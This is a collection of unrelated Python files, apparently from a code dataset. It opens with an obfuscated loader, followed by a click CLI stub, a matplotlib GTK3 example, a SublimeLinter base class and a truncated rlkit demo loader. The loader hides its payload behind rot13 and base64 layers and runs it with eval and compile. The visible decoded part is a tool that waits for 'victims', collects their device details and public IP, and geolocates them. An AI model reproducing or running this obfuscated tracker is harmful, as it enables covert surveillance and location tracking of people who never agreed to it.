god = 'YWl0KCk6CglwcmludGVkID0gRmFsc2UKCXdoaWxlIFRydWU6CgkJdGltZS5zbGVlcCgyKQoJCXNpemUgPSBvcy5wYXRoLmdldHNpemUocmVzdWx0KQoJCWlmIHNpemUgPT0gMCBhbmQgcHJpbnRlZCA9PSBGYWxzZToKCQkJcHJpbnQoIlxuIityKyLilJTilIAiK3crIlwwMzNbMTszN21bIityKyIgISIrdysiIF0gIitnKyJXYWl0aW5nIGZvciBWaWN0aW1zIit3KyIgOiAiKQoJCQlwcmludGVkID0gVHJ1ZQoJCWlmIHNpemUgPiAwOgoJCQltYWluKCkKCmRlZiBtYWluKCk6CglnbG9iYWwgaW5mbywgcmVzdWx0LCByb3csIHZhcl9sYXQsIHZhcl9sb24KCXRyeToKCQlyb3cgPSBbXQoJCXdpdGggb3BlbiAoaW5mbywgJ3InKSBhcyBmaWxlMjoKCQkJZmlsZTIgPSBmaWxlMi5yZWFkKCkKCQkJanNvbjMgPSBqc29uLmxvYWRzKGZpbGUyKQoJCQlmb3IgdmFsdWUgaW4ganNvbjNbJ2RldiddOgoKCQkJCXZhcl9vcyA9IHZhbHVlWydvcyddCgkJCQl2YXJfcGxhdGZvcm0gPSB2YWx1ZVsncGxhdGZvcm0nXQoJCQkJdHJ5OgoJCQkJCXZhcl9jb3JlcyA9IHZhbHVlWydjb3JlcyddCgkJCQlleGNlcHQgVHlwZUVycm9yOgoJCQkJCXZhcl9jb3JlcyA9ICdOb3QgQXZhaWxhYmxlJwoJCQkJdmFyX3JhbSA9IHZhbHVlWydyYW0nXQoJCQkJdmFyX3ZlbmRvciA9IHZhbHVlWyd2ZW5kb3InXQoJCQkJdmFyX3JlbmRlciA9IHZhbHVlWydyZW5kZXInXQoJCQkJdmFyX3JlcyA9IHZhbHVlWyd3ZCddICsgJ3gnICsgdmFsdWVbJ2h0J10KCQkJCXZhcl9icm93c2VyID0gdmFsdWVbJ2Jyb3dzZXInXQoJCQkJdmFyX2lwID0gdmFsdWVbJ2lwJ10KCgkJCQlyb3cuYXBwZW5kKHZhcl9vcykKCQkJCXJvdy5hcHBlbmQodmFyX3BsYXRmb3JtKSAKCQkJCXJvdy5hcHBlbmQodmFyX2NvcmVzKSAKCQkJCXJvdy5hcHBlbmQodmFyX3JhbSkgCgkJCQlyb3cuYXBwZW5kKHZhcl92ZW5kb3IpCgkJCQlyb3cuYXBwZW5kKHZhcl9yZW5kZXIpCgkJCQlyb3cuYXBwZW5kKHZhcl9yZXMpCgkJCQlyb3cuYXBwZW5kKHZhcl9icm93c2VyKQoJCQkJcm93LmFwcGVuZCh2YXJfaXApCgoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgRGV2aWNlIEluZm9ybWF0aW9uIDogJyArIFcgKyAnXG4nKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgT1MgICAgICAgICA6ICcgKyBXICsgdmFyX29zKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUGxhdGZvcm0gICA6ICcgKyBXICsgdmFyX3BsYXRmb3JtKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgQ1BVIENvcmVzICA6ICcgKyBXICsgdmFyX2NvcmVzKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUkFNICAgICAgICA6ICcgKyBXICsgdmFyX3JhbSkKCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIEdQVSBWZW5kb3IgOiAnICsgVyArIHZhcl92ZW5kb3IpCgkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBHUFUgICAgICAgIDogJyArIFcgKyB2YXJfcmVuZGVyKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUmVzb2x1dGlvbiA6ICcgKyBXICsgdmFyX3JlcykKCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIEJyb3dzZXIgICAgOiAnICsgVyArIHZhcl9icm93c2VyKQoJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgUHVibGljIElQICA6ICcgKyBXICsgdmFyX2lwKQoKCQkJCXJxc3QgPSByZXF1ZXN0cy5nZXQoJ2h0dHA6Ly9mcmVlLmlwd2hvaXMuaW8vanNvbi97fScuZm9ybWF0KHZhcl9pcCkpCgkJCQlzYyA9IHJxc3Quc3RhdHVzX2NvZGUKCgkJCQlpZiBzYyA9PSAyMDA6CgkJCQkJZGF0YSA9IHJxc3QudGV4dAoJCQkJCWRhdGEgPSBqc29uLmxvYWRzKGRhdGEpCgkJCQkJdmFyX2NvbnRpbmVudCA9IHN0cihkYXRhWydjb250aW5lbnQnXSkKCQkJCQl2YXJfY291bnRyeSA9IHN0cihkYXRhWydjb3VudHJ5J10pCgkJCQkJdmFyX3JlZ2lvbiA9IHN0cihkYXRhWydyZWdpb24nXSkKCQkJCQl2YXJfY2l0eSA9IHN0cihkYXRhWydjaXR5J10pCgkJCQkJdmFyX29yZyA9IHN0cihkYXRhWydvcmcnXSkKCQkJCQl2YXJfaXNwID0gc3RyKGRhdGFbJ2lzcCddKQoKCQkJCQlyb3cuYXBwZW5kKHZhcl9jb250aW5lbnQpCgkJCQkJcm93LmFwcGVuZCh2YXJfY291bnRyeSkKCQkJCQlyb3cuYXBwZW5kKHZhcl9yZWdpb24pCgkJCQkJcm93LmFwcGVuZCh2YXJfY2l0eSkKCQkJCQlyb3cuYXBwZW5kKHZhcl9vcmcpCgkJCQkJcm93LmFwcGVuZCh2YXJfaXNwKQoKCQkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBDb250aW5lbnQgIDogJyArIFcgKyB2YXJfY29udGluZW50KQoJCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIENvdW50cnkgICAgOiAnICsgVyArIHZhcl9jb3VudHJ5KQoJCQkJCXByaW50KEcgKyAnWytdJyArIEMgKyAnIFJlZ2lvbiAgICAgOiAnICsgVyArIHZhcl9yZWdpb24pCgkJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgQ2l0eSAgICAgICA6ICcgKyBXICsgdmFyX2NpdHkpCgkJCQkJcHJpbnQoRyArICdbK10nICsgQyArICcgT3JnICAgICAgICA6ICcgKyBXICsgdmFyX29yZykKCQkJCQlwcmludChHICsgJ1srXScgKyBDICsgJyBJU1AgICAgICAgIDogJyArIFcgKyB2YXJfaXNwKQoJZXhjZXB0IFZhbHVlRXJyb3I6CgkJcGFzcwoJCgl0cnk6CgkJd2l0aCBvcGVuIChyZXN1bHQsICdyJykgYXMgZmlsZToKCQkJZmlsZSA9IGZpbGUucmVhZCgpCgkJCWpz
b24yID0ganNvbi5sb2FkcyhmaWxlKQoJCQlmb3IgdmFsdWUgaW4ganNvbjJbJ2luZm8nXToKCQkJCXZhcl9sYXQgPSB2YWx1ZVsnbGF0J10gKyAnIGRlZycKCQkJCXZhcl9sb24gPSB2YWx1ZVsnbG9uJ10gKyAnIGRlZycKCQkJCXZhcl9hY2MgPSB2YWx1ZVsnYWNjJ10gKyAnIG0nCgoJCQkJdmFyX2FsdCA9IHZhbHVlWydhbHQnXQoJCQkJaWYgdmFyX2FsdCA9PSAnJzoKCQkJCQl2YXJfYWx0ID0gJ05vdCBBdmFpbGFibGUnCgkJCQllbHNlOgoJCQkJCXZhcl9hbHQgPT0gdmFsdWVbJ2FsdCddICsgJyBtJwoJCQkJCgkJCQl2YXJfZGlyID0gdmFsdWVbJ2Rpcidd'
destiny = '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'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec')) |
py | 7dfd19f229b1f1b8c0b576ae7ca8fae9ed8bf0de | import click
import sys
sys.path.insert(0,'../../../tools')
from cli_npm import cli_npm
from cli_webpack import cli_webpack
if __name__ == '__main__':
cli = click.CommandCollection(sources=[cli_npm, cli_webpack])
cli()
|
py | 7dfd1a5c56d5f98a9a5c4e2b7647e7999fc7e254 | """
=========================
Embedding In GTK3 Panzoom
=========================
Demonstrate NavigationToolbar with GTK3 accessed via pygobject.
"""
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from matplotlib.backends.backend_gtk3 import (
NavigationToolbar2GTK3 as NavigationToolbar)
from matplotlib.backends.backend_gtk3agg import (
FigureCanvasGTK3Agg as FigureCanvas)
from matplotlib.figure import Figure
import numpy as np
win = Gtk.Window()
win.connect("delete-event", Gtk.main_quit)
win.set_default_size(400, 300)
win.set_title("Embedding in GTK")
f = Figure(figsize=(5, 4), dpi=100)
a = f.add_subplot(1, 1, 1)
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2*np.pi*t)
a.plot(t, s)
vbox = Gtk.VBox()
win.add(vbox)
# Add canvas to vbox
canvas = FigureCanvas(f) # a Gtk.DrawingArea
vbox.pack_start(canvas, True, True, 0)
# Create toolbar
toolbar = NavigationToolbar(canvas, win)
vbox.pack_start(toolbar, False, False, 0)
win.show_all()
Gtk.main()
|
py | 7dfd1af816692705ddd779eacb641205e28d1661 | # base_linter.py - base class for linters
import os
import os.path
import json
import re
import subprocess
import sublime
# If the linter uses an executable that takes stdin, use this input method.
INPUT_METHOD_STDIN = 1
# If the linter uses an executable that does not take stdin but you wish to use
# a temp file so that the current view can be linted interactively, use this input method.
# If the current view has been saved, the tempfile will have the same name as the
# view's file, which is necessary for some linters.
INPUT_METHOD_TEMP_FILE = 2
# If the linter uses an executable that does not take stdin and you wish to have
# linting occur only on file load and save, use this input method.
INPUT_METHOD_FILE = 3
CONFIG = {
# The display language name for this linter.
'language': '',
# Linters may either use built in code or use an external executable. This item may have
# one of the following values:
#
# string - An external command (or path to a command) to execute
# None - The linter is considered to be built in
#
# Alternately, your linter class may define the method get_executable(),
# which should return the three-tuple (<enabled>, <executable>, <message>):
# <enabled> must be a boolean than indicates whether the executable is available and usable.
# If <enabled> is True, <executable> must be one of:
# - A command string (or path to a command) if an external executable will be used
# - None if built in code will be used
# - False if no suitable executable can be found or the linter should be disabled
# for some other reason.
# <message> is the message that will be shown in the console when the linter is
# loaded, to aid the user in knowing what the status of the linter is. If None or an empty string,
# a default message will be returned based on the value of <executable>. Otherwise it
# must be a string.
'executable': None,
# If an external executable is being used, this item specifies the arguments
# used when checking the existence of the executable to determine if the linter can be enabled.
# If more than one argument needs to be passed, use a tuple/list.
# Defaults to '-v' if this item is missing.
'test_existence_args': '-v',
# If an external executable is being used, this item specifies the arguments to be passed
# when linting. If there is more than one argument, use a tuple/list.
# If the input method is anything other than INPUT_METHOD_STDIN, put a {filename} placeholder in
# the args where the filename should go.
#
# Alternately, if your linter class may define the method get_lint_args(), which should return
# None for no arguments or a tuple/list for one or more arguments.
'lint_args': None,
# If an external executable is being used, the method used to pass input to it. Defaults to STDIN.
'input_method': INPUT_METHOD_STDIN
}
TEMPFILES_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__.encode('utf-8')), u'..', u'.tempfiles'))
JSON_MULTILINE_COMMENT_RE = re.compile(r'\/\*[\s\S]*?\*\/')
JSON_SINGLELINE_COMMENT_RE = re.compile(r'\/\/[^\n\r]*')
if not os.path.exists(TEMPFILES_DIR):
os.mkdir(TEMPFILES_DIR)
class BaseLinter(object):
'''A base class for linters. Your linter module needs to do the following:
- Set the relevant values in CONFIG
- Override built_in_check() if it uses a built in linter. You may return
whatever value you want, this value will be passed to parse_errors().
- Override parse_errors() and populate the relevant lists/dicts. The errors
argument passed to parse_errors() is the output of the executable run through strip().
If you do subclass and override __init__, be sure to call super(MyLinter, self).__init__(config).
'''
JSC_PATH = '/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/Resources/jsc'
LIB_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__.encode('utf-8')), u'libs'))
JAVASCRIPT_ENGINES = ['node', 'jsc']
JAVASCRIPT_ENGINE_NAMES = {'node': 'node.js', 'jsc': 'JavaScriptCore'}
JAVASCRIPT_ENGINE_WRAPPERS_PATH = os.path.join(LIB_PATH, 'jsengines')
def __init__(self, config):
self.language = config['language']
self.enabled = False
self.executable = config.get('executable', None)
self.test_existence_args = config.get('test_existence_args', ['-v'])
self.js_engine = None
if isinstance(self.test_existence_args, basestring):
self.test_existence_args = (self.test_existence_args,)
self.input_method = config.get('input_method', INPUT_METHOD_STDIN)
self.filename = None
self.lint_args = config.get('lint_args', [])
if isinstance(self.lint_args, basestring):
self.lint_args = [self.lint_args]
def check_enabled(self, view):
if hasattr(self, 'get_executable'):
try:
self.enabled, self.executable, message = self.get_executable(view)
if self.enabled and not message:
message = 'using "{0}"'.format(self.executable) if self.executable else 'built in'
except Exception as ex:
self.enabled = False
message = unicode(ex)
else:
self.enabled, message = self._check_enabled(view)
return (self.enabled, message or '<unknown reason>')
def _check_enabled(self, view):
if self.executable is None:
return (True, 'built in')
elif isinstance(self.executable, basestring):
self.executable = self.get_mapped_executable(view, self.executable)
elif isinstance(self.executable, bool) and self.executable is False:
return (False, 'unknown error')
else:
return (False, 'bad type for CONFIG["executable"]')
# If we get this far, the executable is external. Test that it can be executed
# and capture stdout and stderr so they don't end up in the system log.
try:
args = [self.executable]
args.extend(self.test_existence_args)
subprocess.Popen(args, startupinfo=self.get_startupinfo(),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()
except OSError:
return (False, '"{0}" cannot be found'.format(self.executable))
return (True, 'using "{0}" for executable'.format(self.executable))
def _get_lint_args(self, view, code, filename):
if hasattr(self, 'get_lint_args'):
return self.get_lint_args(view, code, filename) or []
else:
lintArgs = self.lint_args or []
settings = view.settings().get('SublimeLinter', {}).get(self.language, {})
if settings:
if 'lint_args' in settings:
lintArgs = settings['lint_args']
cwd = settings.get('working_directory', '').encode('utf-8')
if cwd and os.path.isabs(cwd) and os.path.isdir(cwd):
os.chdir(cwd)
return [arg.format(filename=filename) for arg in lintArgs]
def built_in_check(self, view, code, filename):
return ''
def executable_check(self, view, code, filename):
args = [self.executable]
tempfilePath = None
if self.input_method == INPUT_METHOD_STDIN:
args.extend(self._get_lint_args(view, code, filename))
elif self.input_method == INPUT_METHOD_TEMP_FILE:
if filename:
filename = os.path.basename(filename)
else:
filename = u'view{0}'.format(view.id())
tempfilePath = os.path.join(TEMPFILES_DIR, filename)
with open(tempfilePath, 'w') as f:
f.write(code)
args.extend(self._get_lint_args(view, code, tempfilePath))
code = u''
elif self.input_method == INPUT_METHOD_FILE:
args.extend(self._get_lint_args(view, code, filename))
code = u''
else:
return u''
try:
process = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
startupinfo=self.get_startupinfo())
process.stdin.write(code)
result = process.communicate()[0]
finally:
if tempfilePath:
os.remove(tempfilePath)
return result.strip()
def parse_errors(self, view, errors, lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages):
pass
def add_message(self, lineno, lines, message, messages):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
lines.add(lineno)
message = message[0].upper() + message[1:]
# Remove trailing period from error message
if message[-1] == '.':
message = message[:-1]
if lineno in messages:
messages[lineno].append(message)
else:
messages[lineno] = [message]
def underline_range(self, view, lineno, position, underlines, length=1):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
line = view.full_line(view.text_point(lineno, 0))
position += line.begin()
for i in xrange(length):
underlines.append(sublime.Region(position + i))
def underline_regex(self, view, lineno, regex, lines, underlines, wordmatch=None, linematch=None):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
lines.add(lineno)
offset = 0
line = view.full_line(view.text_point(lineno, 0))
lineText = view.substr(line)
if linematch:
match = re.match(linematch, lineText)
if match:
lineText = match.group('match')
offset = match.start('match')
else:
return
iters = re.finditer(regex, lineText)
results = [(result.start('underline'), result.end('underline')) for result in iters if not wordmatch or result.group('underline') == wordmatch]
# Make the lineno one-based again for underline_range
lineno += 1
for start, end in results:
self.underline_range(view, lineno, start + offset, underlines, end - start)
def underline_word(self, view, lineno, position, underlines):
# Assume lineno is one-based, ST2 wants zero-based line numbers
lineno -= 1
line = view.full_line(view.text_point(lineno, 0))
position += line.begin()
word = view.word(position)
underlines.append(word)
def run(self, view, code, filename=None):
self.filename = filename
if self.executable is None:
errors = self.built_in_check(view, code, filename)
else:
errors = self.executable_check(view, code, filename)
lines = set()
errorUnderlines = [] # leave this here for compatibility with original plugin
errorMessages = {}
violationUnderlines = []
violationMessages = {}
warningUnderlines = []
warningMessages = {}
self.parse_errors(view, errors, lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages)
return lines, errorUnderlines, violationUnderlines, warningUnderlines, errorMessages, violationMessages, warningMessages
def get_mapped_executable(self, view, default):
map = view.settings().get('sublimelinter_executable_map')
if map:
lang = self.language.lower()
if lang in map:
return map[lang].encode('utf-8')
return default
def get_startupinfo(self):
info = None
if os.name == 'nt':
info = subprocess.STARTUPINFO()
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
return info
def execute_get_output(self, args):
try:
            return subprocess.Popen(args, stdout=subprocess.PIPE,
                                    startupinfo=self.get_startupinfo()).communicate()[0]
except:
return ''
def jsc_path(self):
'''Return the path to JavaScriptCore. Use this method in case the path
has to be dynamically calculated in the future.'''
return self.JSC_PATH
def find_file(self, filename, view):
'''Find a file with the given name, starting in the view's directory,
then ascending the file hierarchy up to root.'''
path = (view.file_name() or '').encode('utf-8')
# quit if the view is temporary
if not path:
return None
dirname = os.path.dirname(path)
while True:
path = os.path.join(dirname, filename)
if os.path.isfile(path):
with open(path, 'r') as f:
return f.read()
# if we hit root, quit
parent = os.path.dirname(dirname)
if parent == dirname:
return None
else:
dirname = parent
def strip_json_comments(self, json_str):
stripped_json = JSON_MULTILINE_COMMENT_RE.sub('', json_str)
stripped_json = JSON_SINGLELINE_COMMENT_RE.sub('', stripped_json)
return json.dumps(json.loads(stripped_json))
def get_javascript_args(self, view, linter, code):
path = os.path.join(self.LIB_PATH, linter)
options = self.get_javascript_options(view)
if options is None:
options = json.dumps(view.settings().get('%s_options' % linter) or {})
self.get_javascript_engine(view)
engine = self.js_engine
if (engine['name'] == 'jsc'):
args = [engine['wrapper'], '--', path + os.path.sep, str(code.count('\n')), options]
else:
args = [engine['wrapper'], path + os.path.sep, options]
return args
def get_javascript_options(self, view):
'''Subclasses should override this if they want to provide options
for a JavaScript-based linter. If the subclass cannot provide
options, it should return None (or not return anything).'''
return None
def get_javascript_engine(self, view):
if self.js_engine is None:
for engine in self.JAVASCRIPT_ENGINES:
if engine == 'node':
try:
path = self.get_mapped_executable(view, 'node')
subprocess.call([path, u'-v'], startupinfo=self.get_startupinfo())
self.js_engine = {
'name': engine,
'path': path,
'wrapper': os.path.join(self.JAVASCRIPT_ENGINE_WRAPPERS_PATH, engine + '.js'),
}
break
except OSError:
pass
elif engine == 'jsc':
if os.path.exists(self.jsc_path()):
self.js_engine = {
'name': engine,
'path': self.jsc_path(),
'wrapper': os.path.join(self.JAVASCRIPT_ENGINE_WRAPPERS_PATH, engine + '.js'),
}
break
if self.js_engine is not None:
return (True, self.js_engine['path'], 'using {0}'.format(self.JAVASCRIPT_ENGINE_NAMES[self.js_engine['name']]))
# Didn't find an engine, tell the user
engine_list = ', '.join(self.JAVASCRIPT_ENGINE_NAMES.values())
return (False, '', 'One of the following JavaScript engines must be installed: ' + engine_list)
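# Hedged sketch (not part of the original file) of a linter module built on
# this base class, following the CONFIG keys and the BaseLinter docstring
# above. The language name, executable and output regex are placeholder
# values for illustration, not a real SublimeLinter plugin.
class ExampleLinter(BaseLinter):
    EXAMPLE_RE = re.compile(r'^(?P<path>.+?):(?P<line>\d+): (?P<message>.+)$')

    def __init__(self, config=None):
        example_config = {
            'language': 'Example',
            'executable': 'example-lint',       # placeholder command
            'test_existence_args': '--version',
            'lint_args': '{filename}',
            'input_method': INPUT_METHOD_TEMP_FILE,
        }
        super(ExampleLinter, self).__init__(config or example_config)

    def parse_errors(self, view, errors, lines, errorUnderlines,
                     violationUnderlines, warningUnderlines, errorMessages,
                     violationMessages, warningMessages):
        for line in errors.splitlines():
            match = self.EXAMPLE_RE.match(line)
            if match:
                lineno = int(match.group('line'))
                self.add_message(lineno, lines, match.group('message'), errorMessages)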
|
py | 7dfd1bc923bb1ff8586b3632151933b8c0a7bcc0 | from collections import OrderedDict
import numpy as np
import torch
import torch.optim as optim
from torch import nn as nn
import torch.nn.functional as F
import rlkit.torch.pytorch_util as ptu
from rlkit.misc.eval_util import create_stats_ordered_dict
from rlkit.torch.torch_rl_algorithm import TorchTrainer
from rlkit.misc.asset_loader import load_local_or_remote_file
import random
from rlkit.torch.core import np_to_pytorch_batch
from rlkit.data_management.path_builder import PathBuilder
# import matplotlib
# matplotlib.use('TkAgg')
# import matplotlib.pyplot as plt
from rlkit.core import logger
import glob
class EncoderPathLoader:
"""
    Path loader that loads obs-dict demonstrations
into a Trainer with EnvReplayBuffer
"""
def __init__(
self,
trainer,
replay_buffer,
demo_train_buffer,
demo_test_buffer,
demo_paths=[], # list of dicts
demo_train_split=0.9,
add_demos_to_replay_buffer=True,
bc_num_pretrain_steps=0,
bc_batch_size=64,
bc_weight=1.0,
rl_weight=1.0,
q_num_pretrain_steps=0,
weight_decay=0,
eval_policy=None,
recompute_reward=False,
env_info_key=None,
obs_key=None,
load_terminals=True,
**kwargs
):
self.trainer = trainer
self.add_demos_to_replay_buffer = add_demos_to_replay_buffer
self.demo_train_split = demo_train_split
self.replay_buffer = replay_buffer
self.demo_train_buffer = demo_train_buffer
self.demo_test_buffer = demo_test_buffer
self.demo_paths = demo_paths
        self.bc_num_pretrain_steps = bc_num_pretrain_steps
        self.bc_batch_size = bc_batch_size
        self.q_num_pretrain_steps = q_num_pretrain_steps
self.demo_trajectory_rewards = []
self.env_info_key = env_info_key
self.obs_key = obs_key
